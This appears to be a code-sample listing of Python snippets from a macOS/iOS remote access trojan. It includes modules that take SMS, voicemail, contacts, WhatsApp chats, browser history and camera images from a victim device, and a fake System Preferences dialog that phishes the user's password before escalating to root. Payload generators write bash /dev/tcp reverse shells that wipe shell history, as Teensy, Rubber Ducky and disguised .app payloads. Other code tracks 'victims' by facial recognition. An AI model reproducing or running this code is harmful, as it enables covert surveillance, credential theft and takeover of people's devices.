예제 #1
0
    def interact(self):
        h.info_general("Listening on port {0}...".format(self.server.port))
        h.info_general("Type \"help\" for commands")
        while 1:
            try:
                input_data = raw_input(self.handle)
                if not input_data:
                    continue
                cmd = input_data.split()[0]
                args = input_data[len(cmd):].strip()
                if cmd == "interact":
                    self.interact_with_session(args)
                elif cmd == "close":
                    self.close_session(args)
                elif cmd == "sessions":
                    self.list_sessions()
                elif cmd == "help":
                    self.show_commands()
                elif cmd == "exit":
                    self.stop_server()
                    return
                else:
                    h.info_error("Invalid Command: " + cmd)

            except KeyboardInterrupt:
                sys.stdout.write("\n")
                self.stop_server()
                return
예제 #2
0
    def run(self, session, cmd_data):
        if len(cmd_data['args'].split(" ")) < 2:
            print(self.usage)
            return

        if cmd_data["args"][0] == "history":
            file_name = "history.db"
            h.info_general("Downloading {0}".format(file_name))
            data = session.download_file(
                '/private/var/mobile/Library/Safari/' + file_name)
            if data:
                f = open(os.path.join('downloads', file_name), 'wb')
                f.write(data)
                f.close()
            history_db_file = os.path.join('downloads', file_name)
            hst = dbfparser.parse_safari_history_db(history_db_file)
            dformat.print_formatted_history(hst)
        elif cmd_data["args"][0] == "bookmarks":
            file_name = "Bookmarks.db"
            h.info_general("Downloading {0}".format(file_name))
            data = session.download_file(
                '/private/var/mobile/Library/Safari/' + file_name)
            if data:
                f = open(os.path.join('downloads', file_name), 'wb')
                f.write(data)
                f.close()
            bookmarks_db_file = os.path.join('downloads', file_name)
            bok = dbfparser.parse_safari_bookmarks_db(bookmarks_db_file)
            dformat.print_formatted_bookmarks(bok)
예제 #3
0
    def run(self, session, cmd_data):
        if not cmd_data['args']:
            print self.usage
            return
        else:
            paths = re.split(r'(?<!\\) ', cmd_data['args'].rstrip())
            if len(paths) > 2:
                print "Usage: upload <local_file> <remote_dir>"
                return

            local_dir = os.path.split(paths[0])[0]
            local_file = os.path.split(paths[0])[1]

            if len(paths) == 1:
                remote_dir = "."
                remote_file = local_file
            else:
                remote_dir = os.path.split(paths[1])[0]
                if not remote_dir:
                    remote_dir = "."
                remote_file = os.path.split(paths[1])[1]
                if not remote_file:
                    remote_file = local_file

            w = os.environ['OLDPWD']
            os.chdir(w)

            session.upload_file(paths[0], remote_dir, remote_file)

            g = os.environ['HOME']
            os.chdir(g + "/mouse")

            h.info_general("File successfully uploaded!")
예제 #4
0
    def run(self, session, cmd_data):
        if not cmd_data['args']:
            print(self.usage)
            return
        else:
            paths = re.split(r'(?<!\\) ', cmd_data['args'].rstrip())
            if len(paths) > 2:
                print("USAGE")
                return

            local_dir = os.path.split(paths[0])[0]
            local_file = os.path.split(paths[0])[1]

            if len(paths) == 1:
                remote_dir = "."
                remote_file = local_file
            else:
                remote_dir = os.path.split(paths[1])[0]
                if not remote_dir:
                    remote_dir = "."
                remote_file = os.path.split(paths[1])[1]
                if not remote_file:
                    remote_file = local_file

            session.upload_file(paths[0], remote_dir, remote_file)
            h.info_general("Done")
예제 #5
0
 def disconnect(self, verbose):
     self.conn.close()
     if verbose:
         h.info_general("Closing session")
         time.sleep(0.5)
     if self.server.multihandler.is_running:
         del self.server.multihandler.sessions_id[self.id]
         del self.server.multihandler.sessions_uid[self.uid]
	def run(self,server):
		while 1:
			persistence = raw_input(h.info_question_raw("Make Persistent? (y/N): ")).lower()
			if persistence == "y":
				shell_command = "while true; do $(bash &> /dev/tcp/"+str(server.host)+"/"+str(server.port)+" 0>&1); sleep 5; done & "
				break
			elif persistence == "n" or not persistence:
				shell_command = "bash &> /dev/tcp/"+str(server.host)+"/"+str(server.port)+" 0>&1;"
				break
			else:
				h.info_error("Unrecognized option!")

		shell_command += "history -wc;killall Terminal"
		if os.path.exists("payloads") == False:
			os.mkdir("payloads")
		if os.path.exists("payloads/teensy_macos") == False:
			os.mkdir("payloads/teensy_macos")
		payload_save_path = "payloads/teensy_macos/teensy_macos.ino"
		payload = """\
#include "Keyboard.h"
const int LED = 13;
void setup() {
	pinMode(LED, OUTPUT);
	Serial.begin(9600);
	delay(1000); //delay to establish connection
	Keyboard.set_modifier(MODIFIERKEY_GUI);
	Keyboard.set_key1(KEY_SPACE);
	Keyboard.send_now();
	Keyboard.set_modifier(0);
	Keyboard.set_key1(0);
	Keyboard.send_now();
	delay(200);
	Keyboard.print("terminal");
	delay(1000);
	keyEnter();
	delay(1000);
	Keyboard.print(\""""+shell_command+"""\");
	keyEnter();
}

void keyEnter() {
	Keyboard.set_key1(KEY_ENTER);
	Keyboard.send_now();
	//release
	Keyboard.set_key1(0);
	Keyboard.send_now();
}

void loop() {
	digitalWrite(LED, HIGH);
	delay(100);
	digitalWrite(LED, LOW);
	delay(100);
}"""
		f = open(payload_save_path,"w")
		f.write(payload)
		f.close()
		h.info_general("Payload saved to " + payload_save_path)
예제 #7
0
 def run(self, session, cmd_data):
     if cmd_data['args'] == "install":
         h.info_general("Installing...")
     elif cmd_data['args'] == "uninstall":
         h.info_general("Uninstalling...")
     else:
         print "Usage: persistence install|uninstall"
         return
     session.send_command(cmd_data)
예제 #8
0
 def close_session(self, session_number):
     if not session_number:
         print "Usage: close <session_number>"
         return
     try:
         session = self.sessions_id[int(session_number)]
         session.disconnect(False)
         h.info_general('Closing session ' + session_number + '...')
     except:
         h.info_error("Invalid session number!")
예제 #9
0
 def run(self, session, cmd_data):
     if cmd_data['args'] == "install":
         h.info_general("Installing...")
     elif cmd_data['args'] == "uninstall":
         h.info_general("Uninstalling...")
     else:
         print self.usage
         return
     result = session.send_command(cmd_data)
     if result:
         h.info_error(result)
예제 #10
0
	def close_session(self,session_number):
		if not session_number:
			print "Usage: Terminate + [Session Number]"
			return
		try:
			session = self.sessions_id[int(session_number)]
			session.disconnect(False)
			h.info_general('Terminating Session ' + session_number)
		except Exception as e:
			print e
			h.info_error("Invalid Session Number. Please Put The Correct Session Number.")
 def close_session(self, session_number):
     if not session_number:
         print "Usage: close (session number)"
         return
     try:
         session = self.sessions_id[int(session_number)]
         session.disconnect(False)
         h.info_general('Closing session ' + session_number)
     except Exception as e:
         print e
         h.info_error("Invalid Session")
예제 #12
0
 def run(self, session, cmd_data):
     file_name = "voicemail.db"
     h.info_general("Downloading {0}".format(file_name))
     data = session.download_file('/private/var/mobile/Library/Voicemail/' +
                                  file_name)
     if data and session.vm_fetched == False:
         f = open(os.path.join('downloads', file_name), 'wb')
         f.write(data)
         f.close()
         session.vm_fetched = True
     voicemail_db_file = os.path.join('downloads', file_name)
     vm = dbfparser.parse_voicemail_db(voicemail_db_file)
     dformat.print_formatted_voicemails(vm)
    def background_listener(self):
        self.server.is_multi = True
        self.is_running = True
        id_number = 1
        while 1:
            if self.is_running:
                session_infos = self.server.listen_for_stager()
                if session_infos:
                    session, hostAddress = session_infos
                    if session.uid in self.sessions_uid.keys():
                        if self.sessions_uid[session.uid].needs_refresh:
                            self.update_session(self.sessions_uid[session.uid],
                                                session)
                        continue
                    else:
                        self.sessions_uid[session.uid] = session
                        self.sessions_id[id_number] = session
                        self.new_session_id = id_number
                        session.id = id_number
                        victim = {}
                        victim_info = {}

                        # Construct victims info dict
                        victim['session_id'] = id_number
                        victim['ip_address'] = hostAddress
                        victim_info['username'] = session.username
                        victim_info['hostname'] = session.hostname
                        victim_info['type'] = session.type
                        victim['victim_info'] = victim_info
                        victim['identified'] = False

                        # Append victim into victim list
                        self.victims['victims'].append(victim)
                        self.victims['total_victims'] += 1
                        id_number += 1
                        sys.stdout.write(
                            "\n{0}[*]{2} Session {1} opened{2}\n{3}".format(
                                h.COLOR_INFO, str(session.id), h.WHITE,
                                self.handle))
                        sys.stdout.flush()

                        # Whether this victim is identified
                        # If identified, add this victim into identified victim list
                        self.identify_victim(session.id)

                        # Notify that victims have been changed
                        self.victims_modify = True
#						self.init_interact_with_session()
            else:
                h.info_general("Exit the listener")
                return
 def run(self, session, cmd_data):
     result = json.loads(session.send_command(cmd_data))
     if 'error' in result:
         h.info_error(result['error'])
         return
     elif 'size' in result:
         size = int(result['size'])
         data = session.sock_receive_data(size)
         file_name = "screenshot_{0}.jpg".format(int(time.time()))
         h.info_general("Saving {0}".format(file_name))
         f = open(os.path.join('downloads', file_name), 'wb')
         f.write(data)
         f.close()
         h.info_general("Saved to ./downloads/{0}".format(file_name))
예제 #15
0
 def run(self, session, cmd_data):
     password = getpass.getpass("Password: "******"\\", "\\\\").replace("'", "\\'")
     cmd_data['cmd'] = "eggsu"
     result = session.send_command(cmd_data)
     if "root" in result:
         h.info_general("Root Granted")
         time.sleep(0.2)
         h.info_general("Escalating Privileges")
         if session.server.is_multi == False:
             session.server.update_session(session)
         else:
             session.needs_refresh = True
     else:
         print "failed getting root"
예제 #16
0
    def run(self,session,cmd_data):
        payload = """
        tell application "Finder"
            activate

            set myprompt to "Type your password to allow System Preferences to make changes"
                        
            set ans to "Cancel"

            repeat
                try
                    set d_returns to display dialog myprompt default answer "" with hidden answer buttons {"Cancel", "OK"} default button "OK" with icon path to resource "FileVaultIcon.icns" in bundle "/System/Library/CoreServices/CoreTypes.bundle"
                    set ans to button returned of d_returns
                    set mypass to text returned of d_returns
                    if mypass > "" then exit repeat
                end try
            end repeat
                        
            try
                do shell script "echo " & quoted form of mypass
            end try
        end tell
        """
        cmd_data.update({"cmd":"applescript","args":payload})
        password = session.send_command(cmd_data).strip()
        #display response
        print h.COLOR_INFO+"[*] "+h.WHITE+"Response: "+h.GREEN+password+h.WHITE
        #prompt for root
        tryroot = raw_input("Would you like to try for root? (Y/n) ")
        tryroot = tryroot if tryroot else "y"
        if tryroot.lower() != "y":
            return ""
        #TODO: I am so lazy, probably should use the su command
        password = password.replace("\\","\\\\").replace("'","\\'")
        cmd_data.update({"cmd":"eggsu","args":password})
        result = session.send_command(cmd_data)
        if "root" in result:
            h.info_general("Root Granted!")
            time.sleep(0.2)
            h.info_general("Escalating Privileges...")
            if session.server.is_multi == False:
                session.server.update_session(session)
            else:
                session.needs_refresh = True
        else:
            h.info_error("Failed getting root!")
        return ""
    def identify_victim(self, session_id):
        if session_id < 1:
            h.info_error("Invalid Session")
            return False
        try:
            idx = session_id - 1
            victim = self.victims['victims'][idx]

            # if already identified, return True
            if victim['identified']:
                return True

            file_name = self.sessions_id[session_id].init_interact()
            response = faceRec(file_name)
            response = json.loads(response)
            h.info_general("Face Rec Result:")
            print(response)
            if response['status'] == "Ok":
                print(response['faceId'])
                faceid = response['faceId']
                if faceid in self.faceid_mapping['FaceToPerson']:
                    person_name = self.faceid_mapping['FaceToPerson'][faceid]
                    for person in self.person_db['Person']:
                        if person['name'] == person_name:
                            identified_victim = {}
                            identified_victim['session_id'] = session_id
                            identified_victim['profile'] = person
                            self.identified_victims[
                                'identified_victims'].append(identified_victim)
                            self.identified_victims[
                                'total_identified_victims'] += 1
                            break
                    victim['identified'] = True
                    return True
                else:
                    print("Person not in Database")
                    return False
            else:
                print("No Face Rec result")
                return False
        except:
            h.info_error("Person cannot be recognized")
            return False
예제 #18
0
    def run(self, server):
        while 1:
            name = raw_input(h.info_general_raw("Application Name> "))
            icon = raw_input(h.info_general_raw("Application Icon> "))
            persistence = raw_input(
                h.info_general_raw("Make Persistent? (y/N): ")).lower()
            if persistence == "y":
                shell_command = "while true; do $(bash &> /dev/tcp/" + str(
                    server.host) + "/" + str(
                        server.port) + " 0>&1); sleep 5; done & "
                break
            elif persistence == "n" or not persistence:
                shell_command = "bash &> /dev/tcp/" + str(
                    server.host) + "/" + str(server.port) + " 0>&1;"
                break
            else:
                h.info_error("invalid option: " + persistence)

        if os.path.exists("payloads") == False:
            os.mkdir("payloads")
        if os.path.exists("payloads/macos_application") == False:
            os.mkdir("payloads/macos_application")
            os.system("""
cp -r resources/payload.app payloads/macos_application
mv payloads/macos_application/payload.app payloads/macos_application/""" +
                      name + """.app
mv """ + icon + """ payloads/macos_application/""" + name +
                      """.app/Contents/Resources/payload.icns
                        """)
        payload_save_path = "payloads/macos_application/" + name + ".app/Contents/MacOS/payload.sh"
        sas = "payloads/macos_application/" + name + ".app"
        payload = """\
#! /usr/bin/env bash
""" + shell_command + """
                """
        f = open(payload_save_path, "w")
        f.write(payload)
        f.close()
        h.info_general("Payload saved to " + sas)
        os.system("chmod +x payloads/macos_application/" + name +
                  ".app/Contents/MacOS/payload.sh")
    def get_all_images(self, victim_name):
        if not victim_name:
            h.info_error("Invalid victim name")
            return None

        try:
            try:
                victim_db_path = "./DB/"
                victims_folders = os.listdir(victim_db_path)
                if victim_name not in victims_folders:
                    h.info_general("Unidentified victim")
                    return None
            except:
                return None

            # Had found the victim folder, get all image files
            if victim_name:
                try:
                    personal_db_image_path = "DB/" + victim_name + "/Images/"
                    if not os.path.exists(personal_db_image_path):
                        os.makedirs(personal_db_image_path)
                    images = [
                        f for f in os.listdir(personal_db_image_path)
                        if f.endswith('.jpg')
                    ]
                    total_images = len(images)
                    results = {}
                    results['images'] = images
                    results['total_images'] = total_images
                    results['image_path'] = personal_db_image_path
                    return results
                except:
                    h.info_error("Fetching Images Error")
                    return None
            else:
                h.info_general("Invalid victim name")
                return None

        except:
            h.info_error("Error in get the images")
            return None
    def run(self, server):
        while 1:
            persistence = raw_input(
                h.info_question_raw("Make Persistent? (y/N): ")).lower()
            if persistence == "y":
                shell_command = "while true; do $(bash &> /dev/tcp/" + str(
                    server.host) + "/" + str(
                        server.port) + " 0>&1); sleep 5; done & "
                shell_clean = "history -wc;killall Terminal"
                break
            elif persistence == "n" or not persistence:
                shell_command = "bash &> /dev/tcp/" + str(
                    server.host) + "/" + str(server.port) + " 0>&1;"
                shell_clean = "history -wc;killall Terminal"
                break
            else:
                h.info_error("Unrecognized option!")

        shell_command += "history -wc;killall Terminal"
        if os.path.exists("payloads") == False:
            os.mkdir("payloads")
        if os.path.exists("payloads/rubber_duck") == False:
            os.mkdir("payloads/rubber_duck")
        payload_save_path = "payloads/rubber_duck/payload.txt"
        payload = """\
DELAY 500
COMMAND SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 500
STRING """ + shell_command + """
DELAY 500
ENTER
DELAY 500
"""
        f = open(payload_save_path, "w")
        f.write(payload)
        f.close()
        h.info_general("Payload saved to " + payload_save_path)
예제 #21
0
    def run(self,session,cmd_data):
		if not cmd_data['args'] or (cmd_data['args'] != "front" and cmd_data['args'] != "back"):
			print self.usage
			return
		if cmd_data['args'] == "back":
			cmd_data['args'] = False
		else:
			cmd_data['args'] = True
		h.info_general("Taking picture...")
		try:
			response = json.loads(session.send_command(cmd_data))
			if 'success' in response:
				size = int(response["size"])
				if cmd_data['args'] == False:
					file_name = "back_{0}.jpg".format(int(time.time()))
				else:
					file_name = "front_{0}.jpg".format(int(time.time()))
				data = session.sock_receive_data(size)
				h.info_general("Saving {0}".format(file_name))
				# save to file
				f = open(os.path.join('downloads',file_name),'w')
				f.write(data)
				f.close()
				h.info_general("Saved to ./downloads/{0}".format(file_name))
			else:
				if 'error' in response:
					h.info_error(response['error'])
				else:
					h.info_error("Unexpected error")
		except Exception as e:
			print e
 def init_interact_with_session(self):
     if self.new_session_id < 1:
         h.info_error("Invalid Session")
         return
     try:
         file_name = self.sessions_id[self.new_session_id].init_interact()
         response = faceRec(file_name)
         response = json.loads(response)
         h.info_general("Face Rec Result:")
         print(response)
         if response['status'] == "Ok":
             print(response['faceId'])
             faceid = response['faceId']
         else:
             print("no data match")
             faceid = ""
         if faceid in self.faceid_mapping['FaceToPerson']:
             person_name = self.faceid_mapping['FaceToPerson'][faceid]
             for person in self.person_db['Person']:
                 if person['name'] == person_name:
                     self.victims[self.new_session_id] = person
                     self.victims_modify = True
     except:
         h.info_error("Person cannot be recognized")
예제 #23
0
 def run(self, session, cmd_data):
     file_name = "notes.sqlite"
     h.info_general("Downloading {0}".format(file_name))
     data = session.download_file('/var/mobile/Library/Notes/' + file_name)
     if data:
         # save to downloads
         h.info_general("Saving {0}".format(file_name))
         f = open(os.path.join('downloads', file_name), 'w')
         f.write(data)
         f.close()
         h.info_general("Saved to ./downloads/{0}".format(file_name))
예제 #24
0
 def run(self, session, cmd_data):
     file_name = "sms.db"
     h.info_general("Downloading {0}".format(file_name))
     data = session.download_file('/var/mobile/Library/SMS/' + file_name)
     if data:
         h.info_general("Saving {0}".format(file_name))
         f = open(os.path.join('downloads', file_name), 'wb')
         f.write(data)
         f.close()
         h.info_general("Saved to ./downloads/{0}".format(file_name))
         session.sms_fetched = True
예제 #25
0
 def run(self, session, cmd_data):
     file_name = "AddressBook.sqlitedb"
     h.info_general("Downloading {0}".format(file_name))
     data = session.download_file('/var/mobile/Library/AddressBook/' +
                                  file_name)
     if data:
         h.info_general("Saving {0}".format(file_name))
         f = open(os.path.join('downloads', file_name), 'wb')
         f.write(data)
         f.close()
         h.info_general("Saved to ./downloads/{0}".format(file_name))
예제 #26
0
 def run(self, session, cmd_data):
     h.info_general("Uploading dylib 1/2...")
     session.upload_file("resources/espro.dylib",
                         "/Library/MobileSubstrate/DynamicLibraries",
                         ".espl.dylib")
     h.info_general("Uploading plist 2/2...")
     session.upload_file("resources/espro.plist",
                         "/Library/MobileSubstrate/DynamicLibraries",
                         ".espl.plist")
     h.info_general("Respring...")
     time.sleep(1)
     session.send_command({"cmd": "killall", "args": "SpringBoard"})
 def run(self, session, cmd_data):
     file_name = "ChatStorage.sqlite"
     h.info_general(
         "Downloading {0}... (this may take a while)".format(file_name))
     data = session.download_file(
         '/private/var/mobile/Containers/Shared/AppGroup/D135448A-EDA9-417C-B6BE-53B0F614C3E2/'
         + file_name)
     if data:
         h.info_general("Saving {0}".format(file_name))
         f = open(os.path.join('downloads', file_name), 'wb')
         f.write(data)
         f.close()
         h.info_general("Saved to ./downloads/{0}".format(file_name))
         session.wa_fetched = True
예제 #28
0
 def run(self, session, cmd_data):
     if not cmd_data['args']:
         print self.usage
         return
     file_name = os.path.split(cmd_data['args'])[-1]
     h.info_general("Downloading {0}".format(file_name))
     data = session.download_file(cmd_data['args'])
     if data:
         # save to downloads
         h.info_general("Saving {0}".format(file_name))
         f = open(os.path.join('downloads', file_name), 'w')
         f.write(data)
         f.close()
         h.info_general("Saved to ./downloads/{0}".format(file_name))
 def run(self, session, cmd_data):
     h.info_general("Taking picture...")
     response = json.loads(session.send_command(cmd_data))
     try:
         success = response["status"]
         if success == 1:
             size = int(response["size"])
             file_name = "isight_{0}.jpg".format(int(time.time()))
             data = session.sock_receive_data(size)
             h.info_general("Saving {0}".format(file_name))
             f = open(os.path.join('downloads', file_name), 'wb')
             f.write(data)
             f.close()
             h.info_general("Saved to ./downloads/{0}".format(file_name))
     except Exception as e:
         print(e)
    def save_images(self, session_id, filename):
        if session_id < 1:
            h.info_error("Invalid Session")
            return
        try:
            idx = session_id - 1
            victim = self.victims['victims'][idx]

            # Only save the image for identified victim
            if not victim['identified']:
                h.info_general("Session has not been identified")
                return

            victim_name = None
            identified_victims = self.identified_victims['identified_victims']
            for victim in identified_victims:
                if victim['session_id'] == session_id:
                    victim_name = victim['profile']['name']
                    break

            # Had found the victim, save the image in personal db
            if victim_name:
                try:
                    image_path = "./DB/pictures/" + filename
                    personal_db_image_path = "./DB/" + victim_name + "/Images/"
                    if not os.path.exists(personal_db_image_path):
                        os.makedirs(personal_db_image_path)
                    image = Image.open(image_path)
                    image.save(personal_db_image_path + filename,
                               optimize=True,
                               quality=10)
                    h.info_general("Saved to" + personal_db_image_path +
                                   filename)
                    return
                except:
                    h.info_error("Image save path error")
                    return
            else:
                h.info_general("Haven't found the target victim")
                return

        except:
            h.info_error("Error in Saving the image")
            return